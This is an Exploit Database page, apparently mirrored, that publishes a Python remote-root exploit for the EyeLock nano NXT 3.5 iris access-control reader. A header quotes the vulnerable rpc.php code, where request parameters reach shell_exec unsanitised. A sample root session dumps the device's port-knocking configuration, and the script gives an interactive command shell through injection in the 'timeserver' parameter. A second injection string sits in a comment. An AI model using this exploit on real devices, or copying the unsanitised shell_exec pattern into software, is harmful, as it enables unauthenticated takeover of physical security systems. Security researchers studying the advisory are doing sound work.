EyeLock nano NXT 3.5 – Remote Code Execution

• Exploit Database
• 106 阅读

• 作者： LiquidWorm
  日期： 2016-08-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40228/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180

  #!/usr/bin/env python # # # EyeLock nano NXT 3.5 Remote Root Exploit # # # Vendor: EyeLock, LLC # Product web page: http://www.eyelock.com # Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1) # NXT Firmware: 3.04.1108 (ICM: 3.4.13) # NXT Firmware: 3.03.944(ICM: 3.3.2) # NXT Firmware: 3.01.646(ICM: 3.1.13) # # Platform: Hardware (Biometric Iris Reader (master)) # # EyeLock is an advanced iris authentication and recognition solutions company # focused on developing next-generation systems for global access control and identity # management. # # Summary: nano NXT® - the next generation of EyeLock’s revolutionary access # control solutions. nano NXT renders all other access control peripherals # obsolete by revolutionizing how identities are protected, authenticated, # and managed. With a sleek low profile and powerful capabilities, the nano # NXT redefines the future of access control. An optional SDK is available # to customers who want to customize their security solutions to integrate # seamlessly with existing applications. The nano NXT authenticates up to 20 # people per minute, in-motion and at-a-distance with unparalleled accuracy. # nano NXT can be used in a variety of environments including commercial/enterprise, # corrections, data centers, education, financial services, government, healthcare # facilities and hospitality. # # Nano NXT is the most advanced compact iris-based identity authentication device # in Eyelock&apos;s comprehensive suite of end-to-end identity authentication solutions. # Nano NXT is a miniaturized iris-based recognition system capable of providing # real-time identification, both in-motion and at a distance. The Nano NXT is an # ideal replacement for card-based systems, and seamlessly controls access to turnstiles, # secured entrances, server rooms and any other physical space. Similarly the device # is powerful and compact enough to secure high-value transactions, critical databases, # network workstations or any other information system. # # Desc: EyeLock&apos;s nano NXT firmware latest version 3.5 (released 25.07.2016) suffers # from multiple unauthenticated command injection vulnerabilities. The issue lies # within the &apos;rpc.php&apos; script located in the &apos;/scripts&apos; directory and can be triggered # when user supplied input is not correctly sanitized while updating the local time for # the device and/or get info from remote time server. The vulnerable script has two REQUEST # parameters &apos;timeserver&apos; and &apos;localtime&apos; that are called within a shell_exec() function # for setting the local time and the hardware clock of the device. An attacker can exploit # these conditions gaining full system (root) access and execute OS commands on the affected # device by injecting special characters to the affected parameters and further bypass # the access control in place. # # Hint: Plenty other RCE bugs are present in the rpc.php and others (like: uploadCertificate.php, # upgrade.php, WebConfig.php, firmwareupdate.php, interfaceeditor.php, etc.) # # ============================================================================= # /scripts/rpc.php: # ----------------- # 9:if (isset($_REQUEST[&apos;action&apos;])) # 10: { # 11:switch($_REQUEST[&apos;action&apos;]) # ... # ... # 181:case &apos;updatetime&apos;: # 182:{ # 183:// do something, the put our response in the response field... # 184:$strDate = shell_exec("rdate -s {$_REQUEST[&apos;timeserver&apos;]} 2>&1"); # 185: # 186:// set the hardware clock. # 187:$strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure... # 188: # 189:$strtheDate = shell_exec("date 2>&1"); # 190: # 191:echo "updatetime|{$strDate}|{$strtheDate}"; # 192: # 193:break; # 194:} # 195: # 196:case &apos;updatelocaltime&apos;: # 197:{ # 198:// do something, the put our response in the response field... # 199:$strDate = shell_exec("date -s &apos;{$_REQUEST[&apos;localtime&apos;]}&apos; 2>&1"); # 200: # 201:// set the hardware clock # 202:$strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure... # 203: # 204:$strtheDate = shell_exec("date 2>&1"); # 205: # 206:echo "updatelocaltime|{$strDate}|{$strtheDate}"; # 207: # 208:break; # 209:} # ============================================================================= # # ----------------------------------------------------------------------------- # Master: 192.168.40.1 # Slave:192.168.40.2 # # $ eyelock.py 192.168.40.1 # # root@192.168.40.1:~# id # uid=0(root) gid=0(root) # # root@192.168.40.1:~# cat /home/root/knockd.conf # [options] # logfile = /var/log/knockd.log # # [openSSH] # sequence= 1973,1975,2013 # seq_timeout = 15 # command = /usr/sbin/iptables -D INPUT -p tcp --dport 22 -j DROP # tcpflags= syn # # [closeSSH] # sequence= 91,85,70 # seq_timeout = 5 # command = /usr/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP # tcpflags= syn # # # root@192.168.40.1:~# exit # # $ # ----------------------------------------------------------------------------- # # # Tested on: GNU/Linux (armv7l) #lighttpd/1.4.35 #SQLite/3.8.7.2 #PHP/5.6.6 # # # Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic # @zeroscience # # # Advisory ID: ZSL-2016-5357 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5357.php # # # 10.06.2016 #   import re,sys,os import requests   piton = os.path.basename(sys.argv[0])   print &apos;&apos;&apos; --------------------------------------------------------- EyeLock nano NXT <=3.5 [Open Sesame] Remote Root Exploit   Zero Science Lab - http://zeroscience.mk ZSL-2016-5357   --------------------------------------------------------- &apos;&apos;&apos;   if len(sys.argv) < 2: print &apos;\n\x20\x20[*] Usage: &apos;+piton+&apos; <ipaddress>\n&apos; sys.exit()   ipaddr = sys.argv[1]   print while True: try: cmd = raw_input(&apos;root@&apos;+ipaddr+&apos;:~# &apos;) # http://EyelockNxtMasterIP/scripts/rpc.php?action=updatelocaltime&localtime=%26whoami%26 execute = requests.get(&apos;http://&apos;+ipaddr+&apos;/scripts/rpc.php?action=updatetime&timeserver=||&apos;+cmd) pattern = re.compile(r&apos;updatetime\|(.*?)\|&apos;,re.S|re.M) cmdout = pattern.match(execute.text) print cmdout.groups()[0].strip() print if cmd.strip() == &apos;exit&apos;: break except Exception: break   sys.exit()